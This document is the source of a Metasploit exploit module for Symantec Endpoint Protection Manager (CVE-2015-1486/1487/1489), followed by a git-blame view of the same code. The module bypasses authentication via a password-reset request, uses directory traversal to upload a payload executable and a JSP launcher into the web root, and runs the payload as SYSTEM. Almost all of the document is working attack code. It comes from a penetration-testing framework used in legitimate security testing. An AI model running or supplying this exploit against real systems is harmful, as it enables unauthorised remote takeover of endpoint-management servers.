metasploit-framework/modules/exploits/windows/http/sepm_auth_bypass_rce.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
      'Description'    => %q{
        This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
        in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
        include an authentication bypass, a directory traversal and a privilege escalation to
        get privileged code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Markus Wulftange', #discovery
          'bperry' # metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2015-1486'],
          ['CVE', '2015-1487'],
          ['CVE', '2015-1489'],
          ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
        ],
      'DefaultOptions' => {
        'SSL' => true
      },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic',
            {
              'Arch' => ARCH_X86,
              'Payload' => {
                'DisableNops' => true
              }
            }
          ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jul 31 2015',
      'DefaultTarget'  => 0))

      register_options(
        [
          Opt::RPORT(8443),
          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
        ], self.class)
  end

  def exploit
    meterp = Rex::Text.rand_text_alpha(10)
    jsp = Rex::Text.rand_text_alpha(10)

    print_status("#{peer} - Getting cookie...")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_post' => {
        'ActionType' => 'ResetPassword',
        'UserID' => 'admin',
        'Domain' => ''
      }
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
    end

    cookie = res.get_cookies

    if cookie.nil? || cookie.empty?
      fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
    end

    exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
    }

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_get' => {
        'ActionType' => 'BinaryFile',
        'Action' => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
        'KnownHosts' => '.'
      },
      'data' => payload.encoded_exe,
      'cookie' => cookie,
      'ctype' => ''
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end

    register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")

    print_status("#{peer} - Uploading JSP page to execute the payload...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_get' => {
        'ActionType' => 'BinaryFile',
        'Action' => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
        'KnownHosts' => '.'
      },
      'data' => exec,
      'cookie' => cookie,
      'ctype' => ''
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end

    register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")

    print_status("#{peer} - Executing payload. Manual cleanup will be required.")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
    }, 5)
  end
end
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

small code cleanup 2015-08-02 21:36:41 +00:00			`class Metasploit4 < Msf::Exploit::Remote`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`Rank = ExcellentRanking`

Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`include Msf::Exploit::FileDropper`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info={})`
			`super(update_info(info,`
Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`'Description' => %q{`
Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager`
Complete description 2015-08-14 22:03:21 +00:00			`in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities`
			`include an authentication bypass, a directory traversal and a privilege escalation to`
			`get privileged code execution.`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`'Markus Wulftange', #discovery`
			`'bperry' # metasploit module`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`],`
			`'References' =>`
			`[`
			`['CVE', '2015-1486'],`
			`['CVE', '2015-1487'],`
exploit cve 2015-1489 to get SYSTEM 2015-08-02 13:31:03 +00:00			`['CVE', '2015-1489'],`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']`
			`],`
set default RPORT and SSL 2015-08-02 13:59:36 +00:00			`'DefaultOptions' => {`
			`'SSL' => true`
			`},`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`[ 'Automatic',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Payload' => {`
			`'DisableNops' => true`
			`}`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`}`
Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`],`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`],`
exploit cve 2015-1489 to get SYSTEM 2015-08-02 13:31:03 +00:00			`'Privileged' => true,`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`'DisclosureDate' => 'Jul 31 2015',`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
set default RPORT and SSL 2015-08-02 13:59:36 +00:00			`Opt::RPORT(8443),`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`OptString.new('TARGETURI', [true, 'The path of the web application', '/']),`
			`], self.class)`
			`end`

			`def exploit`
randomize the file names 2015-08-01 21:50:06 +00:00			`meterp = Rex::Text.rand_text_alpha(10)`
			`jsp = Rex::Text.rand_text_alpha(10)`

Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`print_status("#{peer} - Getting cookie...")`
add some status lines 2015-08-02 20:03:59 +00:00
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`res = send_request_cgi({`
			`'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),`
			`'method' => 'POST',`
			`'vars_post' => {`
			`'ActionType' => 'ResetPassword',`
			`'UserID' => 'admin',`
			`'Domain' => ''`
			`}`
			`})`

Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`unless res && res.code == 200`
			`fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")`
check res before calling get_cookies 2015-08-01 22:58:41 +00:00			`end`

add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`cookie = res.get_cookies`

Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`if cookie.nil? \|\| cookie.empty?`
			`fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")`
check if cookie is actually returned, and if not, fail 2015-08-02 20:22:40 +00:00			`end`

exploit cve 2015-1489 to get SYSTEM 2015-08-02 13:31:03 +00:00			`exec = %Q{<%@page import="java.io.,java.util.,com.sygate.scm.server.util.*"%>`
			`<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>`
			`}`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00
Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`print_status("#{peer} - Uploading payload...")`
single quotes and some error handling 2015-08-02 23:25:17 +00:00			`res = send_request_cgi({`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),`
			`'method' => 'POST',`
			`'vars_get' => {`
			`'ActionType' => 'BinaryFile',`
			`'Action' => 'UploadPackage',`
randomize the file names 2015-08-01 21:50:06 +00:00			`'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`'KnownHosts' => '.'`
			`},`
			`'data' => payload.encoded_exe,`
			`'cookie' => cookie,`
			`'ctype' => ''`
			`})`

single quotes and some error handling 2015-08-02 23:25:17 +00:00			`unless res && res.code == 200`
Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")`
single quotes and some error handling 2015-08-02 23:25:17 +00:00			`end`

Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")`

			`print_status("#{peer} - Uploading JSP page to execute the payload...")`
single quotes and some error handling 2015-08-02 23:25:17 +00:00			`res = send_request_cgi({`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),`
			`'method' => 'POST',`
			`'vars_get' => {`
			`'ActionType' => 'BinaryFile',`
			`'Action' => 'UploadPackage',`
randomize the file names 2015-08-01 21:50:06 +00:00			`'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`'KnownHosts' => '.'`
			`},`
			`'data' => exec,`
			`'cookie' => cookie,`
			`'ctype' => ''`
			`})`

single quotes and some error handling 2015-08-02 23:25:17 +00:00			`unless res && res.code == 200`
Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")`
single quotes and some error handling 2015-08-02 23:25:17 +00:00			`end`

Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")`

			`print_status("#{peer} - Executing payload. Manual cleanup will be required.")`
no need to store res for the later requests 2015-08-01 23:00:35 +00:00			`send_request_cgi({`
randomize the file names 2015-08-01 21:50:06 +00:00			`'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")`
Do ruby fixing and use FileDropper 2015-08-14 22:00:27 +00:00			`}, 5)`
add the sepm auth bypass rce module 2015-08-01 21:40:03 +00:00			`end`
			`end`